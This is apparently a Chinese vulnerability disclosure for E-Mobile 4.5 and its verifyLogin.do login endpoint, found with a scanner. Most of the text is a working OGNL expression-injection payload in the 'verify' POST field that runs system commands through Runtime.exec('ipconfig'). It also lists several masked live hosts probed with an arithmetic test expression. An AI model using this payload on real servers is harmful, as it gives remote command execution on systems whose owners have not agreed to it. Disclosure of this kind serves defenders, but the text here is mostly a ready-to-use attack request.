### 简要描述:
神器扫出来的
### 详细说明:
```
版本:E-Mobile 4.5
查看源码即可看到
**.**.**.**/verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}
```
[<img src="https://images.seebug.org/upload/201604/13203326d776e002a1b7c275dc97015fe9d7090b.png" alt="表达式注入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/13203326d776e002a1b7c275dc97015fe9d7090b.png)
```
其他案例
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
```
### 漏洞证明:
详细说明
京公网安备 11010502034610号
暂无评论